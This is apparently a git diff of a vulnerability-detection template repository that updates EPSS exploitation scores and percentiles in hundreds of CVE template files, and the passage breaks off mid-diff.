http/cves/2024/CVE-2024-34257.yaml | 2 +- http/cves/2024/CVE-2024-3469.yaml | 4 ++-- http/cves/2024/CVE-2024-34982.yaml | 2 +- http/cves/2024/CVE-2024-35219.yaml | 4 ++-- http/cves/2024/CVE-2024-3552.yaml | 2 +- http/cves/2024/CVE-2024-35693.yaml | 4 ++-- http/cves/2024/CVE-2024-35694.yaml | 4 ++-- http/cves/2024/CVE-2024-36675.yaml | 2 +- http/cves/2024/CVE-2024-36683.yaml | 4 ++-- http/cves/2024/CVE-2024-36837.yaml | 2 +- http/cves/2024/CVE-2024-36857.yaml | 2 +- http/cves/2024/CVE-2024-3742.yaml | 2 +- http/cves/2024/CVE-2024-3753.yaml | 2 +- http/cves/2024/CVE-2024-37656.yaml | 2 +- http/cves/2024/CVE-2024-37728.yaml | 2 +- http/cves/2024/CVE-2024-37881.yaml | 2 +- http/cves/2024/CVE-2024-3822.yaml | 2 +- http/cves/2024/CVE-2024-38288.yaml | 2 +- http/cves/2024/CVE-2024-38353.yaml | 2 +- http/cves/2024/CVE-2024-38472.yaml | 2 +- http/cves/2024/CVE-2024-3848.yaml | 4 ++-- http/cves/2024/CVE-2024-3850.yaml | 2 +- http/cves/2024/CVE-2024-39646.yaml | 2 +- http/cves/2024/CVE-2024-39887.yaml | 2 +- http/cves/2024/CVE-2024-39903.yaml | 2 +- http/cves/2024/CVE-2024-39907.yaml | 2 +- http/cves/2024/CVE-2024-39914.yaml | 2 +- http/cves/2024/CVE-2024-40348.yaml | 2 +- http/cves/2024/CVE-2024-40711.yaml | 4 ++-- http/cves/2024/CVE-2024-41667.yaml | 2 +- http/cves/2024/CVE-2024-4180.yaml | 2 +- http/cves/2024/CVE-2024-41810.yaml | 2 +- http/cves/2024/CVE-2024-41955.yaml | 2 +- http/cves/2024/CVE-2024-42009.yaml | 4 ++-- http/cves/2024/CVE-2024-4257.yaml | 2 +- http/cves/2024/CVE-2024-42852.yaml | 2 +- http/cves/2024/CVE-2024-43160.yaml | 2 +- http/cves/2024/CVE-2024-4325.yaml | 2 +- http/cves/2024/CVE-2024-4348.yaml | 2 +- http/cves/2024/CVE-2024-4358.yaml | 2 +- http/cves/2024/CVE-2024-43917.yaml | 4 ++-- http/cves/2024/CVE-2024-43971.yaml | 4 ++-- http/cves/2024/CVE-2024-44349.yaml | 2 +- http/cves/2024/CVE-2024-4439.yaml | 2 +- http/cves/2024/CVE-2024-4455.yaml | 4 ++-- http/cves/2024/CVE-2024-44762.yaml | 2 +- http/cves/2024/CVE-2024-44849.yaml | 4 ++-- http/cves/2024/CVE-2024-45216.yaml | 2 +- http/cves/2024/CVE-2024-45241.yaml | 2 +- http/cves/2024/CVE-2024-45293.yaml | 2 +- http/cves/2024/CVE-2024-45309.yaml | 2 +- http/cves/2024/CVE-2024-45388.yaml | 2 +- http/cves/2024/CVE-2024-45440.yaml | 4 ++-- http/cves/2024/CVE-2024-45507.yaml | 2 +- http/cves/2024/CVE-2024-45622.yaml | 2 +- http/cves/2024/CVE-2024-4577.yaml | 4 ++-- http/cves/2024/CVE-2024-46506.yaml | 4 ++-- http/cves/2024/CVE-2024-46627.yaml | 2 +- http/cves/2024/CVE-2024-47073.yaml | 2 +- http/cves/2024/CVE-2024-47308.yaml | 2 +- http/cves/2024/CVE-2024-47533.yaml | 2 +- http/cves/2024/CVE-2024-4836.yaml | 2 +- http/cves/2024/CVE-2024-4841.yaml | 2 +- http/cves/2024/CVE-2024-48455.yaml | 2 +- http/cves/2024/CVE-2024-4940.yaml | 2 +- http/cves/2024/CVE-2024-49757.yaml | 2 +- http/cves/2024/CVE-2024-50334.yaml | 2 +- http/cves/2024/CVE-2024-50477.yaml | 2 +- http/cves/2024/CVE-2024-5057.yaml | 4 ++-- http/cves/2024/CVE-2024-5082.yaml | 2 +- http/cves/2024/CVE-2024-5084.yaml | 2 +- http/cves/2024/CVE-2024-50857.yaml | 2 +- http/cves/2024/CVE-2024-51228.yaml | 2 +- http/cves/2024/CVE-2024-51378.yaml | 2 +- http/cves/2024/CVE-2024-51482.yaml | 2 +- http/cves/2024/CVE-2024-51739.yaml | 2 +- http/cves/2024/CVE-2024-51978.yaml | 2 +- http/cves/2024/CVE-2024-5217.yaml | 2 +- http/cves/2024/CVE-2024-5230.yaml | 2 +- http/cves/2024/CVE-2024-52762.yaml | 2 +- http/cves/2024/CVE-2024-52763.yaml | 2 +- http/cves/2024/CVE-2024-5315.yaml | 4 ++-- http/cves/2024/CVE-2024-5334.yaml | 2 +- http/cves/2024/CVE-2024-53991.yaml | 4 ++-- http/cves/2024/CVE-2024-53995.yaml | 4 ++-- http/cves/2024/CVE-2024-5421.yaml | 4 ++-- http/cves/2024/CVE-2024-54330.yaml | 2 +- http/cves/2024/CVE-2024-54763.yaml | 2 +- http/cves/2024/CVE-2024-54764.yaml | 2 +- http/cves/2024/CVE-2024-54767.yaml | 2 +- http/cves/2024/CVE-2024-55218.yaml | 2 +- http/cves/2024/CVE-2024-55416.yaml | 2 +- http/cves/2024/CVE-2024-55550.yaml | 4 ++-- http/cves/2024/CVE-2024-55591.yaml | 4 ++-- http/cves/2024/CVE-2024-55956.yaml | 4 ++-- http/cves/2024/CVE-2024-56159.yaml | 4 ++-- http/cves/2024/CVE-2024-56325.yaml | 4 ++-- http/cves/2024/CVE-2024-56512.yaml | 2 +- http/cves/2024/CVE-2024-57045.yaml | 2 +- http/cves/2024/CVE-2024-57049.yaml | 2 +- http/cves/2024/CVE-2024-57514.yaml | 2 +- http/cves/2024/CVE-2024-57727.yaml | 2 +- http/cves/2024/CVE-2024-58136.yaml | 4 ++-- http/cves/2024/CVE-2024-5910.yaml | 2 +- http/cves/2024/CVE-2024-5932.yaml | 4 ++-- http/cves/2024/CVE-2024-5936.yaml | 4 ++-- http/cves/2024/CVE-2024-5947.yaml | 2 +- http/cves/2024/CVE-2024-6028.yaml | 2 +- http/cves/2024/CVE-2024-6049.yaml | 2 +- http/cves/2024/CVE-2024-6159.yaml | 2 +- http/cves/2024/CVE-2024-6289.yaml | 2 +- http/cves/2024/CVE-2024-6366.yaml | 2 +- http/cves/2024/CVE-2024-6396.yaml | 2 +- http/cves/2024/CVE-2024-6420.yaml | 2 +- http/cves/2024/CVE-2024-6517.yaml | 2 +- http/cves/2024/CVE-2024-6555.yaml | 2 +- http/cves/2024/CVE-2024-6586.yaml | 2 +- http/cves/2024/CVE-2024-6646.yaml | 2 +- http/cves/2024/CVE-2024-6651.yaml | 2 +- http/cves/2024/CVE-2024-6690.yaml | 2 +- http/cves/2024/CVE-2024-6746.yaml | 4 ++-- http/cves/2024/CVE-2024-6753.yaml | 4 ++-- http/cves/2024/CVE-2024-6842.yaml | 4 ++-- http/cves/2024/CVE-2024-6886.yaml | 2 +- http/cves/2024/CVE-2024-6892.yaml | 2 +- http/cves/2024/CVE-2024-6922.yaml | 2 +- http/cves/2024/CVE-2024-6926.yaml | 2 +- http/cves/2024/CVE-2024-7008.yaml | 2 +- http/cves/2024/CVE-2024-7097.yaml | 2 +- http/cves/2024/CVE-2024-7120.yaml | 4 ++-- http/cves/2024/CVE-2024-7339.yaml | 2 +- http/cves/2024/CVE-2024-7354.yaml | 2 +- http/cves/2024/CVE-2024-7399.yaml | 2 +- http/cves/2024/CVE-2024-7591.yaml | 2 +- http/cves/2024/CVE-2024-7593.yaml | 2 +- http/cves/2024/CVE-2024-7714.yaml | 2 +- http/cves/2024/CVE-2024-7786.yaml | 2 +- http/cves/2024/CVE-2024-7854.yaml | 2 +- http/cves/2024/CVE-2024-7928.yaml | 2 +- http/cves/2024/CVE-2024-8021.yaml | 2 +- http/cves/2024/CVE-2024-8484.yaml | 2 +- http/cves/2024/CVE-2024-8517.yaml | 2 +- http/cves/2024/CVE-2024-8522.yaml | 2 +- http/cves/2024/CVE-2024-8529.yaml | 2 +- http/cves/2024/CVE-2024-8698.yaml | 2 +- http/cves/2024/CVE-2024-8752.yaml | 2 +- http/cves/2024/CVE-2024-8856.yaml | 2 +- http/cves/2024/CVE-2024-8859.yaml | 2 +- http/cves/2024/CVE-2024-8877.yaml | 4 ++-- http/cves/2024/CVE-2024-8883.yaml | 4 ++-- http/cves/2024/CVE-2024-9007.yaml | 2 +- http/cves/2024/CVE-2024-9047.yaml | 4 ++-- http/cves/2024/CVE-2024-9161.yaml | 2 +- http/cves/2024/CVE-2024-9166.yaml | 2 +- http/cves/2024/CVE-2024-9186.yaml | 2 +- http/cves/2024/CVE-2024-9463.yaml | 2 +- http/cves/2024/CVE-2024-9474.yaml | 2 +- http/cves/2024/CVE-2024-9772.yaml | 2 +- http/cves/2024/CVE-2024-9989.yaml | 2 +- http/cves/2025/CVE-2025-0107.yaml | 2 +- http/cves/2025/CVE-2025-0108.yaml | 4 ++-- http/cves/2025/CVE-2025-0133.yaml | 2 +- http/cves/2025/CVE-2025-0674.yaml | 2 +- http/cves/2025/CVE-2025-0868.yaml | 2 +- http/cves/2025/CVE-2025-10210.yaml | 2 +- http/cves/2025/CVE-2025-10211.yaml | 2 +- http/cves/2025/CVE-2025-1023.yaml | 2 +- http/cves/2025/CVE-2025-1035.yaml | 4 ++-- http/cves/2025/CVE-2025-1097.yaml | 4 ++-- http/cves/2025/CVE-2025-1098.yaml | 4 ++-- http/cves/2025/CVE-2025-11307.yaml | 4 ++-- http/cves/2025/CVE-2025-11371.yaml | 2 +- http/cves/2025/CVE-2025-11749.yaml | 4 ++-- http/cves/2025/CVE-2025-11833.yaml | 2 +- http/cves/2025/CVE-2025-12055.yaml | 2 +- http/cves/2025/CVE-2025-12139.yaml | 4 ++-- http/cves/2025/CVE-2025-12480.yaml | 2 +- http/cves/2025/CVE-2025-1323.yaml | 2 +- http/cves/2025/CVE-2025-1562.yaml | 2 +- http/cves/2025/CVE-2025-1743.yaml | 2 +- http/cves/2025/CVE-2025-1974.yaml | 4 ++-- http/cves/2025/CVE-2025-2010.yaml | 2 +- http/cves/2025/CVE-2025-2011.yaml | 2 +- http/cves/2025/CVE-2025-20188.yaml | 2 +- http/cves/2025/CVE-2025-20281.yaml | 4 ++-- http/cves/2025/CVE-2025-20362.yaml | 4 ++-- http/cves/2025/CVE-2025-2075.yaml | 2 +- http/cves/2025/CVE-2025-2127.yaml | 2 +- http/cves/2025/CVE-2025-2129.yaml | 2 +- http/cves/2025/CVE-2025-2294.yaml | 2 +- http/cves/2025/CVE-2025-23061.yaml | 2 +- http/cves/2025/CVE-2025-24016.yaml | 4 ++-- http/cves/2025/CVE-2025-24354.yaml | 2 +- http/cves/2025/CVE-2025-24514.yaml | 4 ++-- http/cves/2025/CVE-2025-2473.yaml | 2 +- http/cves/2025/CVE-2025-24799.yaml | 2 +- http/cves/2025/CVE-2025-24893.yaml | 4 ++-- http/cves/2025/CVE-2025-24963.yaml | 2 +- http/cves/2025/CVE-2025-25037.yaml | 2 +- http/cves/2025/CVE-2025-25257.yaml | 4 ++-- http/cves/2025/CVE-2025-25570.yaml | 4 ++-- http/cves/2025/CVE-2025-2563.yaml | 4 ++-- http/cves/2025/CVE-2025-2610.yaml | 2 +- http/cves/2025/CVE-2025-26319.yaml | 2 +- http/cves/2025/CVE-2025-2636.yaml | 2 +- http/cves/2025/CVE-2025-26793.yaml | 2 +- http/cves/2025/CVE-2025-27007.yaml | 2 +- http/cves/2025/CVE-2025-2709.yaml | 2 +- http/cves/2025/CVE-2025-2710.yaml | 4 ++-- http/cves/2025/CVE-2025-2711.yaml | 4 ++-- http/cves/2025/CVE-2025-27112.yaml | 2 +- http/cves/2025/CVE-2025-2712.yaml | 4 ++-- http/cves/2025/CVE-2025-27134.yaml | 2 +- http/cves/2025/CVE-2025-27218.yaml | 2 +- http/cves/2025/CVE-2025-27225.yaml | 2 +- http/cves/2025/CVE-2025-2748.yaml | 4 ++-- http/cves/2025/CVE-2025-27505.yaml | 2 +- http/cves/2025/CVE-2025-2775.yaml | 2 +- http/cves/2025/CVE-2025-2776.yaml | 2 +- http/cves/2025/CVE-2025-2777.yaml | 2 +- http/cves/2025/CVE-2025-27888.yaml | 2 +- http/cves/2025/CVE-2025-27892.yaml | 2 +- http/cves/2025/CVE-2025-27915.yaml | 4 ++-- http/cves/2025/CVE-2025-28228.yaml | 2 +- http/cves/2025/CVE-2025-28367.yaml | 2 +- http/cves/2025/CVE-2025-28906.yaml | 2 +- http/cves/2025/CVE-2025-29927.yaml | 2 +- http/cves/2025/CVE-2025-30406.yaml | 4 ++-- http/cves/2025/CVE-2025-30567.yaml | 2 +- http/cves/2025/CVE-2025-31131.yaml | 2 +- http/cves/2025/CVE-2025-31324.yaml | 4 ++-- http/cves/2025/CVE-2025-31486.yaml | 2 +- http/cves/2025/CVE-2025-31489.yaml | 2 +- http/cves/2025/CVE-2025-32429.yaml | 2 +- http/cves/2025/CVE-2025-32430.yaml | 2 +- http/cves/2025/CVE-2025-32432.yaml | 4 ++-- http/cves/2025/CVE-2025-3248.yaml | 4 ++-- http/cves/2025/CVE-2025-32813.yaml | 2 +- http/cves/2025/CVE-2025-32814.yaml | 2 +- http/cves/2025/CVE-2025-32815.yaml | 2 +- http/cves/2025/CVE-2025-32969.yaml | 2 +- http/cves/2025/CVE-2025-34023.yaml | 2 +- http/cves/2025/CVE-2025-34026.yaml | 2 +- http/cves/2025/CVE-2025-34028.yaml | 4 ++-- http/cves/2025/CVE-2025-34031.yaml | 2 +- http/cves/2025/CVE-2025-34032.yaml | 2 +- http/cves/2025/CVE-2025-34035.yaml | 2 +- http/cves/2025/CVE-2025-34077.yaml | 2 +- http/cves/2025/CVE-2025-34141.yaml | 2 +- http/cves/2025/CVE-2025-34143.yaml | 2 +- http/cves/2025/CVE-2025-3415.yaml | 2 +- http/cves/2025/CVE-2025-34291.yaml | 4 ++-- http/cves/2025/CVE-2025-34299.yaml | 2 +- http/cves/2025/CVE-2025-34509.yaml | 2 +- http/cves/2025/CVE-2025-3472.yaml | 2 +- http/cves/2025/CVE-2025-3605.yaml | 4 ++-- http/cves/2025/CVE-2025-36604.yaml | 2 +- http/cves/2025/CVE-2025-4008.yaml | 2 +- http/cves/2025/CVE-2025-4009.yaml | 2 +- http/cves/2025/CVE-2025-40630.yaml | 2 +- http/cves/2025/CVE-2025-4123.yaml | 2 +- http/cves/2025/CVE-2025-41393.yaml | 2 +- http/cves/2025/CVE-2025-41646.yaml | 2 +- http/cves/2025/CVE-2025-4210.yaml | 4 ++-- http/cves/2025/CVE-2025-4302.yaml | 2 +- http/cves/2025/CVE-2025-4380.yaml | 2 +- http/cves/2025/CVE-2025-4388.yaml | 2 +- http/cves/2025/CVE-2025-4396.yaml | 2 +- http/cves/2025/CVE-2025-44136.yaml | 2 +- http/cves/2025/CVE-2025-44137.yaml | 2 +- http/cves/2025/CVE-2025-44148.yaml | 2 +- http/cves/2025/CVE-2025-44177.yaml | 2 +- http/cves/2025/CVE-2025-4427.yaml | 4 ++-- http/cves/2025/CVE-2025-45854.yaml | 4 ++-- http/cves/2025/CVE-2025-45985.yaml | 4 ++-- http/cves/2025/CVE-2025-4632.yaml | 4 ++-- http/cves/2025/CVE-2025-46349.yaml | 4 ++-- http/cves/2025/CVE-2025-46550.yaml | 4 ++-- http/cves/2025/CVE-2025-46822.yaml | 2 +- http/cves/2025/CVE-2025-47204.yaml | 2 +- http/cves/2025/CVE-2025-47423.yaml | 2 +- http/cves/2025/CVE-2025-47539.yaml | 2 +- http/cves/2025/CVE-2025-47646.yaml | 4 ++-- http/cves/2025/CVE-2025-47812.yaml | 4 ++-- http/cves/2025/CVE-2025-47813.yaml | 2 +- http/cves/2025/CVE-2025-48703.yaml | 2 +- http/cves/2025/CVE-2025-48828.yaml | 2 +- http/cves/2025/CVE-2025-48954.yaml | 2 +- http/cves/2025/CVE-2025-49029.yaml | 2 +- http/cves/2025/CVE-2025-49113.yaml | 4 ++-- http/cves/2025/CVE-2025-49493.yaml | 2 +- http/cves/2025/CVE-2025-49596.yaml | 4 ++-- http/cves/2025/CVE-2025-49706.yaml | 4 ++-- http/cves/2025/CVE-2025-49825.yaml | 2 +- http/cves/2025/CVE-2025-5086.yaml | 2 +- http/cves/2025/CVE-2025-51482.yaml | 2 +- http/cves/2025/CVE-2025-51991.yaml | 2 +- http/cves/2025/CVE-2025-52207.yaml | 2 +- http/cves/2025/CVE-2025-52472.yaml | 2 +- http/cves/2025/CVE-2025-52488.yaml | 2 +- http/cves/2025/CVE-2025-52665.yaml | 2 +- http/cves/2025/CVE-2025-5287.yaml | 2 +- http/cves/2025/CVE-2025-52970.yaml | 4 ++-- http/cves/2025/CVE-2025-5301.yaml | 2 +- http/cves/2025/CVE-2025-53770.yaml | 4 ++-- http/cves/2025/CVE-2025-53771.yaml | 4 ++-- http/cves/2025/CVE-2025-53833.yaml | 2 +- http/cves/2025/CVE-2025-54251.yaml | 2 +- http/cves/2025/CVE-2025-54589.yaml | 2 +- http/cves/2025/CVE-2025-54782.yaml | 2 +- http/cves/2025/CVE-2025-55161.yaml | 2 +- http/cves/2025/CVE-2025-55182.yaml | 4 ++-- http/cves/2025/CVE-2025-5569.yaml | 2 +- http/cves/2025/CVE-2025-55748.yaml | 2 +- http/cves/2025/CVE-2025-55749.yaml | 2 +- http/cves/2025/CVE-2025-56819.yaml | 4 ++-- http/cves/2025/CVE-2025-5701.yaml | 2 +- http/cves/2025/CVE-2025-5777.yaml | 4 ++-- http/cves/2025/CVE-2025-57819.yaml | 2 +- http/cves/2025/CVE-2025-57822.yaml | 2 +- http/cves/2025/CVE-2025-58179.yaml | 4 ++-- http/cves/2025/CVE-2025-58434.yaml | 2 +- http/cves/2025/CVE-2025-58443.yaml | 4 ++-- http/cves/2025/CVE-2025-58751.yaml | 2 +- http/cves/2025/CVE-2025-59049.yaml | 2 +- http/cves/2025/CVE-2025-59287.yaml | 4 ++-- http/cves/2025/CVE-2025-5961.yaml | 2 +- http/cves/2025/CVE-2025-6058.yaml | 2 +- http/cves/2025/CVE-2025-6174.yaml | 4 ++-- http/cves/2025/CVE-2025-61884.yaml | 4 ++-- http/cves/2025/CVE-2025-6204.yaml | 2 +- http/cves/2025/CVE-2025-6205.yaml | 4 ++-- http/cves/2025/CVE-2025-63387.yaml | 4 ++-- http/cves/2025/CVE-2025-6403.yaml | 2 +- http/cves/2025/CVE-2025-66472.yaml | 4 ++-- http/cves/2025/CVE-2025-6851.yaml | 4 ++-- http/cves/2025/CVE-2025-68613.yaml | 4 ++-- http/cves/2025/CVE-2025-69200.yaml | 4 ++-- http/cves/2025/CVE-2025-6970.yaml | 4 ++-- http/cves/2025/CVE-2025-7160.yaml | 4 ++-- http/cves/2025/CVE-2025-8848.yaml | 4 ++-- http/cves/2025/CVE-2025-8868.yaml | 4 ++-- http/cves/2025/CVE-2025-8943.yaml | 4 ++-- http/cves/2025/CVE-2025-9196.yaml | 2 +- http/cves/2025/CVE-2025-9744.yaml | 2 +- http/cves/2026/CVE-2026-21858.yaml | 4 ++-- javascript/cves/2012/CVE-2012-2122.yaml | 2 +- javascript/cves/2016/CVE-2016-8706.yaml | 4 ++-- javascript/cves/2018/CVE-2018-8011.yaml | 4 ++-- javascript/cves/2019/CVE-2019-6443.yaml | 2 +- javascript/cves/2019/CVE-2019-9193.yaml | 2 +- javascript/cves/2021/CVE-2021-35394.yaml | 2 +- javascript/cves/2021/CVE-2021-36754.yaml | 4 ++-- javascript/cves/2023/CVE-2023-34039.yaml | 2 +- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- javascript/cves/2023/CVE-2023-48795.yaml | 4 ++-- network/cves/2001/CVE-2001-1473.yaml | 2 +- network/cves/2004/CVE-2004-0437.yaml | 2 +- network/cves/2004/CVE-2004-0656.yaml | 4 ++-- network/cves/2004/CVE-2004-1602.yaml | 2 +- network/cves/2004/CVE-2004-1641.yaml | 2 +- network/cves/2004/CVE-2004-2687.yaml | 4 ++-- network/cves/2005/CVE-2005-0850.yaml | 2 +- network/cves/2005/CVE-2005-0851.yaml | 2 +- network/cves/2006/CVE-2006-2173.yaml | 2 +- network/cves/2006/CVE-2006-6565.yaml | 2 +- network/cves/2008/CVE-2008-5281.yaml | 2 +- network/cves/2009/CVE-2009-0884.yaml | 2 +- network/cves/2010/CVE-2010-3867.yaml | 2 +- network/cves/2011/CVE-2011-0762.yaml | 2 +- network/cves/2011/CVE-2011-3171.yaml | 2 +- network/cves/2014/CVE-2014-1842.yaml | 2 +- network/cves/2014/CVE-2014-1843.yaml | 2 +- network/cves/2016/CVE-2016-2004.yaml | 2 +- network/cves/2016/CVE-2016-3510.yaml | 2 +- network/cves/2017/CVE-2017-5645.yaml | 2 +- network/cves/2019/CVE-2019-20176.yaml | 2 +- network/cves/2020/CVE-2020-0796.yaml | 2 +- network/cves/2020/CVE-2020-14644.yaml | 2 +- network/cves/2020/CVE-2020-1938.yaml | 2 +- network/cves/2020/CVE-2020-35359.yaml | 2 +- network/cves/2020/CVE-2020-9274.yaml | 2 +- network/cves/2021/CVE-2021-27877.yaml | 2 +- network/cves/2021/CVE-2021-30047.yaml | 2 +- network/cves/2021/CVE-2021-40524.yaml | 2 +- network/cves/2022/CVE-2022-24706.yaml | 2 +- network/cves/2023/CVE-2023-37582.yaml | 2 +- network/cves/2023/CVE-2023-48788.yaml | 4 ++-- network/cves/2024/CVE-2024-23108.yaml | 4 ++-- network/cves/2024/CVE-2024-48651.yaml | 2 +- network/cves/2025/CVE-2025-25256.yaml | 4 ++-- network/cves/2025/CVE-2025-47188.yaml | 4 ++-- network/cves/2025/CVE-2025-8286.yaml | 2 +- 2243 files changed, 2541 insertions(+), 2541 deletions(-) diff --git a/code/cves/2014/CVE-2014-0160.yaml b/code/cves/2014/CVE-2014-0160.yaml index 83b9498e995..7a688fd51c5 100644 --- a/code/cves/2014/CVE-2014-0160.yaml +++ b/code/cves/2014/CVE-2014-0160.yaml @@ -15,7 +15,7 @@ info: metadata: verified: true classification: - epss-score: 0.94464 + epss-score: 0.94467 epss-percentile: 0.99995 tags: cve,cve2014,openssl,heartbleed,code,kev,vkev,vuln diff --git a/code/cves/2019/CVE-2019-0604.yaml b/code/cves/2019/CVE-2019-0604.yaml index cc256bdb8d6..09231e4b7e0 100644 --- a/code/cves/2019/CVE-2019-0604.yaml +++ b/code/cves/2019/CVE-2019-0604.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-0604 cwe-id: CWE-20 epss-score: 0.94441 - epss-percentile: 0.99989 + epss-percentile: 0.99987 metadata: verified: true vendor: microsoft diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index c4d9ba212ac..ce46a51af66 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-14287 cwe-id: CWE-755 epss-score: 0.86126 - epss-percentile: 0.99372 + epss-percentile: 0.99374 cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index 2b39bdd0a3f..972253257c7 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.8 cve-id: CVE-2021-3156 cwe-id: CWE-193 - epss-score: 0.92669 - epss-percentile: 0.99735 + epss-score: 0.92622 + epss-percentile: 0.99731 cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/code/cves/2022/CVE-2022-42475.yaml b/code/cves/2022/CVE-2022-42475.yaml index 466dceb3af0..855ccaf8edf 100644 --- a/code/cves/2022/CVE-2022-42475.yaml +++ b/code/cves/2022/CVE-2022-42475.yaml @@ -24,8 +24,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-42475 cwe-id: CWE-197,CWE-787 - epss-score: 0.94005 - epss-percentile: 0.99885 + epss-score: 0.94062 + epss-percentile: 0.99895 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index cfd16f789f8..3d83ab12c83 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.8 cve-id: CVE-2023-2640 cwe-id: CWE-863 - epss-score: 0.91622 - epss-percentile: 0.99659 + epss-score: 0.91742 + epss-percentile: 0.99665 cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:* metadata: verified: true diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index d68edd034dc..a07c5568477 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-6246 cwe-id: CWE-787,CWE-122 epss-score: 0.24316 - epss-percentile: 0.95915 + epss-percentile: 0.9592 cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/code/cves/2024/CVE-2024-22120.yaml b/code/cves/2024/CVE-2024-22120.yaml index 8f2c7f2daa8..30dfc7fa1f1 100644 --- a/code/cves/2024/CVE-2024-22120.yaml +++ b/code/cves/2024/CVE-2024-22120.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-22120 cwe-id: CWE-20 epss-score: 0.93259 - epss-percentile: 0.99792 + epss-percentile: 0.99791 metadata: max-request: 1 vendor: zabbix diff --git a/code/cves/2024/CVE-2024-55556.yaml b/code/cves/2024/CVE-2024-55556.yaml index c4e146195bf..164b7ae5a7b 100644 --- a/code/cves/2024/CVE-2024-55556.yaml +++ b/code/cves/2024/CVE-2024-55556.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-55556 cwe-id: CWE-502 epss-score: 0.8111 - epss-percentile: 0.99119 + epss-percentile: 0.99121 metadata: verified: true max-request: 2 diff --git a/code/cves/2024/CVE-2024-56331.yaml b/code/cves/2024/CVE-2024-56331.yaml index 75fb3c3fa4e..915e6a0abe1 100644 --- a/code/cves/2024/CVE-2024-56331.yaml +++ b/code/cves/2024/CVE-2024-56331.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-56331 cwe-id: CWE-22 epss-score: 0.41406 - epss-percentile: 0.97283 + epss-percentile: 0.97281 metadata: verified: true shodan-query: http.title:"Uptime Kuma" diff --git a/code/cves/2024/CVE-2024-9487.yaml b/code/cves/2024/CVE-2024-9487.yaml index a9b665406c0..f77b6390ef6 100644 --- a/code/cves/2024/CVE-2024-9487.yaml +++ b/code/cves/2024/CVE-2024-9487.yaml @@ -15,7 +15,7 @@ info: - https://github.com/advisories/GHSA-g83h-4727-5rpv classification: epss-score: 0.55491 - epss-percentile: 0.97992 + epss-percentile: 0.9799 metadata: verified: true shodan-query: title:"GitHub Enterprise" diff --git a/code/cves/2025/CVE-2025-1550.yaml b/code/cves/2025/CVE-2025-1550.yaml index a5c4c60e67f..d49e934b044 100644 --- a/code/cves/2025/CVE-2025-1550.yaml +++ b/code/cves/2025/CVE-2025-1550.yaml @@ -16,7 +16,7 @@ info: - https://towerofhanoi.it/writeups/cve-2025-1550/ classification: epss-score: 0.04785 - epss-percentile: 0.89156 + epss-percentile: 0.89154 metadata: max-request: 1 tags: cve,cve2025,code,keras,rce,ml diff --git a/code/cves/2025/CVE-2025-22457.yaml b/code/cves/2025/CVE-2025-22457.yaml index a9292ed3c8c..1cf395004c9 100644 --- a/code/cves/2025/CVE-2025-22457.yaml +++ b/code/cves/2025/CVE-2025-22457.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.0 cve-id: CVE-2025-22457 cwe-id: CWE-121,CWE-787 - epss-score: 0.49132 - epss-percentile: 0.97684 + epss-score: 0.61518 + epss-percentile: 0.98257 cpe: cpe:2.3:a:ivanti:connect_secure:*:-:*:*:*:*:*:* metadata: vendor: ivanti diff --git a/code/cves/2025/CVE-2025-25291.yaml b/code/cves/2025/CVE-2025-25291.yaml index 6a0c621f753..6ac06e33cdc 100644 --- a/code/cves/2025/CVE-2025-25291.yaml +++ b/code/cves/2025/CVE-2025-25291.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2025-25291 cwe-id: CWE-347 epss-score: 0.13848 - epss-percentile: 0.94091 + epss-percentile: 0.94086 metadata: verified: true vendor: gitlab diff --git a/code/cves/2025/CVE-2025-32433.yaml b/code/cves/2025/CVE-2025-32433.yaml index 885fe311308..ae376982a47 100644 --- a/code/cves/2025/CVE-2025-32433.yaml +++ b/code/cves/2025/CVE-2025-32433.yaml @@ -22,8 +22,8 @@ info: cvss-score: 10 cve-id: CVE-2025-32433 cwe-id: CWE-306 - epss-score: 0.43921 - epss-percentile: 0.97419 + epss-score: 0.48106 + epss-percentile: 0.97628 metadata: verified: true max-request: 1 diff --git a/code/cves/2025/CVE-2025-54309.yaml b/code/cves/2025/CVE-2025-54309.yaml index c747a329770..9298e1569b3 100644 --- a/code/cves/2025/CVE-2025-54309.yaml +++ b/code/cves/2025/CVE-2025-54309.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-54309 - epss-score: 0.63875 - epss-percentile: 0.98361 + epss-score: 0.73547 + epss-percentile: 0.98762 cwe-id: CWE-287,CWE-362 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:* metadata: diff --git a/code/cves/2025/CVE-2025-68926.yaml b/code/cves/2025/CVE-2025-68926.yaml index 638f2f32931..63a2066b3d0 100644 --- 